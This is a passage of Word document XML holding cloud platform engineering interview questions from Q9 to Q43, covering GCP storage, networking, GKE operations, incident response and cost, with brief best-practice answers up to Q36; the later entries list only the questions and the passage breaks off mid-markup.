      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. Cloud Storage security: How would you design Cloud Storage bucket security for logs, artifacts, and data exports, including IAM, retention, lifecycle, CMEK, and public access prevention?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Enable Public Access Prevention at the org policy level so buckets can never be made public even by mistake, use uniform bucket-level IAM (not legacy ACLs) scoped to specific service accounts/groups per bucket purpose, and apply retention policies/object lock for compliance-sensitive logs so they can't be deleted early. Use CMEK for sensitive data exports where you need key rotation control, and configure lifecycle rules to transition or delete objects automatically based on age to control cost.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. GCP networking: How would you design GCP Shared VPC, service projects, firewall rules, private service access, DNS, and service networking for a multi-team platform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a host project owning the Shared VPC with subnets per environment/region, and attach service projects per team so each team deploys resources into the shared network without owning networking config themselves. Centralize firewall rule management in the host project with tag-based rules rather than IP-based, set up Private Service Access for managed services (Cloud SQL, etc.), and use Cloud DNS private zones for consistent internal service discovery across all service projects.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. GKE upgrades: A GKE cluster upgrade caused service disruption. How would you design a safer upgrade strategy for control plane, node pools, PDBs, and workloads?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Upgrade the control plane first (GKE manages this with minimal disruption for regional clusters), then roll node pools using surge upgrades (create new nodes before draining old ones) rather than in-place upgrades. Ensure every workload has a PodDisruptionBudget so the upgrade respects minimum availability during node drains, test the upgrade path in a staging cluster first, and schedule production upgrades during low-traffic windows with monitoring dashboards open to catch regressions early.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. Helm: How would you structure Helm charts and values for repeatable deployments across environments without creating configuration drift?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use one chart per application with a base values.yaml holding sane defaults, and environment-specific values files (values-dev.yaml, values-prod.yaml) that only override what genuinely differs, rather than duplicating the entire values file per environment. Store values files in version control alongside the chart, template only what needs to vary, and use a GitOps tool (ArgoCD) to reconcile the deployed state against the values file so manual `helm upgrade` runs can't silently drift from what's committed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. Network policies: A service should only receive traffic from one namespace and one ingress gateway. How would you implement and validate Kubernetes NetworkPolicies?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with a default-deny NetworkPolicy in the target namespace, then add an explicit allow policy with podSelector/namespaceSelector matching only the permitted source namespace and the ingress gateway's pod labels. Validate by attempting a connection from an unauthorized pod/namespace (should fail) and from the two permitted sources (should succeed), and confirm the CNI plugin in use actually enforces NetworkPolicies, since some default CNIs don't without additional configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. Service mesh: When would you introduce Istio or Anthos Service Mesh, and what are the operational risks around mTLS, traffic splitting, retries, and observability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Introduce a service mesh once you need consistent mTLS across many services, fine-grained traffic splitting for canary/A-B testing, or unified observability without instrumenting every service individually - not as a default for every cluster, since it adds real operational complexity. Risks include sidecar resource overhead, debugging difficulty when mesh-level retries mask real failures or double up with application-level retries, and mTLS misconfiguration silently breaking traffic if strict mode is enabled before every service is enrolled.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. Progressive delivery: How would you implement canary or blue-green releases using Cloud Deploy, Argo Rollouts, metrics, and automatic rollback?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use Cloud Deploy or Argo Rollouts to shift a small percentage of traffic (e.g. 5-10%) to the new version, define success metrics (error rate, latency, business KPIs) that are automatically evaluated during the canary window via Cloud Monitoring or Prometheus, and configure automatic rollback if metrics breach thresholds rather than requiring a human to notice and act. Gradually increase traffic percentage on success, and keep the rollback path as fast as the promotion path so a bad release is reverted in minutes, not hours.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. Release readiness: A production release passed CI but caused customer impact. How would you design production readiness checks and release gates to prevent this?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Add release gates beyond CI - a canary stage with automated metric validation, a load/smoke test against a staging environment that mirrors production traffic patterns, and a readiness checklist (rollback plan documented, on-call aware, feature-flagged if risky) before full rollout. Treat CI passing as necessary but not sufficient; the real signal that a release is safe comes from observing real or synthetic traffic against it before it reaches 100% of users.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. Incident leadership: You are the incident commander for a GKE outage. How would you manage technical debugging, stakeholder communication, timeline, mitigation, and postmortem?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: As incident commander, focus on coordination rather than personally debugging - assign a technical lead to drive investigation, designate a scribe to keep a timeline, and own regular stakeholder updates on a fixed cadence even when there's no new information, since silence erodes trust during an incident. Prioritize mitigation (rollback, scale, traffic shift) over root-causing while impact continues, and once resolved, drive a blameless postmortem with concrete action items and owners, not just a narrative.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. RCA: Walk me through how you would write a strong RCA for a repeated Kubernetes outage and turn it into preventive engineering work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong RCA documents the timeline, customer impact, the technical root cause (not just the trigger - dig into why the system allowed that trigger to cause an outage), and explicitly separates the immediate fix from the systemic prevention work. Since this is a repeated outage, the RCA should call out why the previous fix didn't prevent recurrence, and action items should be specific, owned, and dated - converting the recurring pattern into a permanent guardrail (test, alert, or architectural change) rather than another one-off patch.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. Error budgets: How would you explain error budgets to product managers and use them to make release decisions?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Explain it as a shared budget for imperfection: if the SLO allows 99.9% availability, that 0.1% is a budget the team can spend on releases, experiments, and acceptable risk - once it's exhausted, the team should slow down and focus on reliability rather than shipping new features. Use it in release decisions concretely: if the error budget is healthy, ship faster and take more risk; if it's nearly exhausted, require extra review or freeze non-critical releases until reliability recovers, making the tradeoff data-driven instead of political.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q20. ELK/OpenSearch: When would you use ELK or OpenSearch in addition to Cloud Logging, and how would you manage index cost and retention?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use ELK/OpenSearch when you need advanced full-text search, custom dashboards, or cross-cutting analysis that Cloud Logging's query language doesn't support well, or when logs need to live outside GCP for multi-cloud/compliance reasons. Manage cost with index lifecycle management - hot indices for recent, frequently-queried data on fast storage, warm/cold tiers for older data, and automated deletion or archival to cold storage past a retention window, plus filtering out low-value log volume before ingestion rather than indexing everything.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q21. Admission controls: How would you enforce Kubernetes security standards using Gatekeeper, Kyverno, or admission controls without blocking developer velocity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start policies in audit/dry-run mode so violations are visible without blocking deployments, give teams a grace period and clear error messages pointing to exactly what needs to change, and only move a policy to enforcing once most workloads already pass it. Keep the policy set focused on genuinely high-risk violations (privileged containers, missing resource limits, public LoadBalancer without review) rather than blocking on stylistic preferences, which is what erodes developer trust in the guardrails.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q22. Security Command Center: How would you operationalize Security Command Center findings into triage, ownership, SLAs, and remediation workflows?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Route SCC findings automatically into a ticketing system tagged with the owning team (derived from resource labels), assign SLAs by severity (critical findings remediated in days, low severity in weeks), and track aging findings in a dashboard leadership reviews regularly. Suppress known false positives explicitly (with a documented reason and expiry) rather than letting teams ignore the noise, and periodically audit whether closed findings were actually fixed, not just marked resolved.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q23. Secrets migration: How would you migrate applications from mounted JSON service account keys to Workload Identity and Secret Manager?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Enable Workload Identity on the cluster and node pools, create the IAM binding mapping each Kubernetes ServiceAccount to its GCP service account, and update application deployments to use that KSA instead of a mounted key volume - test in a non-production namespace first since the change is transparent to most client libraries. Once verified, disable and eventually delete the old JSON keys, and migrate any application secrets (not just GCP credentials) from environment variables or ConfigMaps into Secret Manager accessed via the same Workload Identity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q24. Landing zone: How would you design a GCP landing zone for a product company, including org hierarchy, folders, projects, Shared VPC, IAM, org policies, logging, and billing?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Structure folders by environment or business unit (e.g. prod/non-prod at the top level, then team folders beneath), with one project per workload/environment combination rather than shared projects that mix concerns. Centralize networking via Shared VPC from a host project, enforce guardrails with org policies (restrict public IPs, require OS Login, restrict resource locations), aggregate logs and billing to dedicated projects, and grant IAM at the folder level where possible so new projects inherit consistent governance automatically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q25. FinOps: A monthly GCP bill increased by 40 percent after a platform migration. How would you investigate and reduce cost without harming reliability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Break down the billing export by project, service, and SKU to find exactly what grew, and compare against what changed in the migration (new resource types, higher replica counts, a different machine family, egress traffic patterns). Common culprits are unoptimized machine types, missing autoscaling limits, or unexpected cross-region/cross-zone egress; address the specific driver (rightsizing, committed use discounts, reducing egress) rather than broadly cutting resources, and validate reliability metrics didn't regress after each cost change.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q26. DR/backup: How would you define RTO and RPO for a critical service on GCP, and how would you test backup, restore, and regional failover?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Define RTO (how long the business can tolerate the service being down) and RPO (how much data loss is acceptable) based on business impact, not technical convenience, then design backup frequency and failover architecture to meet those targets - a 5-minute RPO requires continuous replication, not nightly backups. Test regularly with real restore drills and full regional failover game days, not just backup-completed checks, since an untested backup is not a proven recovery capability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q27. Multi-region design: You have a multi-region reliability requirement on GCP. How would you design traffic routing, data stores, failover, monitoring, and incident response?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a global load balancer with health checks to route traffic to the nearest healthy region, and choose data stores with multi-region replication (Spanner, or a primary/replica setup with documented failover for Cloud SQL) matched to your consistency requirements. Automate failover detection and traffic shifting where possible rather than relying on manual DNS changes, and ensure monitoring and incident response playbooks explicitly cover the multi-region failure scenario, not just single-instance failures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q28. Platform maturity: How would you evaluate whether a platform is mature enough for product-company scale across reliability, security, cost, developer experience, and automation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Assess each dimension against concrete signals rather than opinion: reliability (SLOs defined and met, incident frequency trending down), security (baseline controls enforced by policy not convention, findings tracked to closure), cost (visibility and accountability per team, not just a total bill), developer experience (time from idea to production, self-service adoption rate), and automation (percentage of provisioning that's self-service versus ticket-driven). A mature platform has measurable answers to all five, not just anecdotes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q29. Gateway/API strategy: How would you choose between Ingress, Gateway API, service mesh, load balancers, and Apigee for different traffic management requirements?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use Ingress or the newer Gateway API for straightforward HTTP routing into the cluster; Gateway API is the forward-looking choice since it's more expressive and vendor-neutral for advanced routing. Add a service mesh only when you need mTLS and traffic control between services inside the cluster, not just at the edge. Reserve Apigee for external-facing API management needs - rate limiting, API keys, monetization, developer portals - that go beyond simple traffic routing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q30. MLOps lifecycle: How would you design MLflow or Vertex AI model lifecycle management with approval, deployment, monitoring, drift detection, and rollback?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Track every training run's parameters, metrics, and artifacts in MLflow/Vertex Experiments, register a model version only after it passes evaluation gates, and require an explicit approval step (automated threshold check or human review) before promotion to production. Deploy behind a versioned endpoint so rollback is a config change, monitor prediction distributions for drift against the training baseline, and trigger a defined response (alert, retrain, rollback) rather than letting drift silently degrade accuracy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q31. GPU workloads: How would you schedule GPU workloads on GKE with taints, tolerations, node pools, quotas, cost controls, and observability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Create a dedicated GPU node pool tainted so only GPU-requesting pods schedule there, and add matching tolerations plus resource requests (nvidia.com/gpu) on those workloads. Use quotas to prevent runaway GPU consumption by any one team, prefer spot/preemptible GPU nodes for fault-tolerant batch workloads to cut cost significantly, and monitor GPU utilization (not just pod scheduling) since idle-but-allocated GPUs are a common silent cost leak.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q32. Cloud SQL backup restore: A Cloud SQL instance has accidental data deletion. How would you validate backups, point-in-time recovery, restore testing, application cutover, and communication?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Confirm point-in-time recovery is enabled and identify the exact timestamp just before the deletion occurred, then restore to a new instance (never overwrite the original) so you can validate data integrity before committing to a cutover. Test the restored instance against a read-only query set to confirm the data is correct, plan the application cutover (connection string change, brief maintenance window) carefully, and communicate the incident timeline and data loss window transparently to affected stakeholders.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q33. Regional failover drill: How would you plan and run a failover game day for a GKE service with Cloud SQL, Pub/Sub, load balancing, DNS, and observability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Define the failure scenario precisely (full region outage), set clear success criteria (RTO/RPO targets, which alerts should fire), and run it in a controlled window with stakeholders aware, ideally starting in staging before production. Execute the failover procedure exactly as documented (not from memory), measure actual time-to-recovery against target, verify data consistency in the failed-over Cloud SQL/Pub/Sub state, and capture gaps in the runbook or tooling to fix before the next drill.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q34. GKE private cluster: A private GKE cluster cannot pull images or reach Google APIs. How would you debug private nodes, NAT, Private Google Access, DNS, routes, and firewall rules?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Verify Private Google Access is enabled on the subnet (required for private nodes to reach Google APIs without a public IP), and check that Cloud NAT is configured if nodes need general internet egress for non-Google endpoints. Confirm DNS resolves *.googleapis.com correctly (private.googleapis.com or restricted.googleapis.com depending on config), check firewall rules allow egress to the required IP ranges, and verify Artifact Registry permissions and Workload Identity bindings are correct for image pulls specifically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q35. GKE image pull failures: Pods are failing with ImagePullBackOff after a registry migration. How would you debug Artifact Registry permissions, Workload Identity, image tags, network, and pull secrets?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check `kubectl describe pod` for the exact error message first (permission denied vs not found vs network timeout tell very different stories), then verify the GKE node service account or Workload Identity-bound identity has the artifactregistry.reader role on the new registry. Confirm the image reference (region, project, repository, tag) was actually updated everywhere it's referenced, check network connectivity/firewall rules to the new registry endpoint, and verify any imagePullSecrets are still valid if using a non-GCP registry path.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q36. GKE node pressure: Nodes show memory pressure and pods are being evicted. How would you investigate requests, limits, QoS classes, daemonsets, autoscaling, and app behavior?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check whether pods are set with accurate resource requests/limits - if requests are too low, the scheduler overpacks nodes and real usage causes pressure; if limits are missing entirely, one runaway pod can starve others. Review QoS classes (Guaranteed pods are evicted last), check DaemonSet overhead consuming node capacity that isn't accounted for in scheduling decisions, and confirm cluster autoscaler is actually adding nodes in response to pressure rather than being capped by a low max node count.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q37. Kubernetes API server overload: The API server has high latency and controllers are falling behind. How would you use API Priority and Fairness, audit logs, request metrics, and client throttling to find and contain the source?</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API server overload: The API server has high latency and controllers are falling behind. How would you use API Priority and Fairness, audit logs, request metrics, and client throttling to find and contain the source?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q38. Kubernetes etcd performance: A self-managed cluster has slow writes and intermittent leader changes in etcd. How would you investigate disk latency, database size, fragmentation, quorum health, snapshots, and safe recovery?</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etcd performance: A self-managed cluster has slow writes and intermittent leader changes in etcd. How would you investigate disk latency, database size, fragmentation, quorum health, snapshots, and safe recovery?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q39. Kubernetes scheduler internals: Walk through the scheduling cycle from an unscheduled Pod to node binding. How do filtering, scoring, preemption, topology spread constraints, and scheduler profiles affect the decision?</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scheduler internals: Walk through the scheduling cycle from an unscheduled Pod to node binding. How do filtering, scoring, preemption, topology spread constraints, and scheduler profiles affect the decision?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q40. Kubernetes scheduling deadlock: Several critical Pods remain Pending even though aggregate cluster capacity appears sufficient. How would you analyze bin-packing, affinity rules, topology constraints, taints, PVC topology, and preemption?</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scheduling deadlock: Several critical Pods remain Pending even though aggregate cluster capacity appears sufficient. How would you analyze bin-packing, affinity rules, topology constraints, taints, PVC topology, and preemption?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q41. Kubernetes graceful termination: A service drops requests during every rollout despite passing readiness checks. How would you coordinate endpoint removal, preStop, SIGTERM handling, terminationGracePeriodSeconds, load-balancer draining, and application shutdown?</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graceful termination: A service drops requests during every rollout despite passing readiness checks. How would you coordinate endpoint removal, preStop, SIGTERM handling, terminationGracePeriodSeconds, load-balancer draining, and application shutdown?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q42. Kubernetes PDB failure scenario: A node upgrade is blocked by PodDisruptionBudgets, but relaxing them could violate availability targets. How would you diagnose the constraints and complete the maintenance safely?</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PDB failure scenario: A node upgrade is blocked by PodDisruptionBudgets, but relaxing them could violate availability targets. How would you diagnose the constraints and complete the maintenance safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q43. Kubernetes HPA instability: An HPA rapidly scales up and down while latency remains unstable. How would you inspect metric freshness, utilization math, missing requests, stabilization windows, scaling policies, and downstream bottlenecks?</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HPA instability: An HPA rapidly scales up and down while latency remains unstable. How would you inspect metric freshness, utilization math, missing requests, stabilization windows, scaling policies, and downstream bottlenecks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
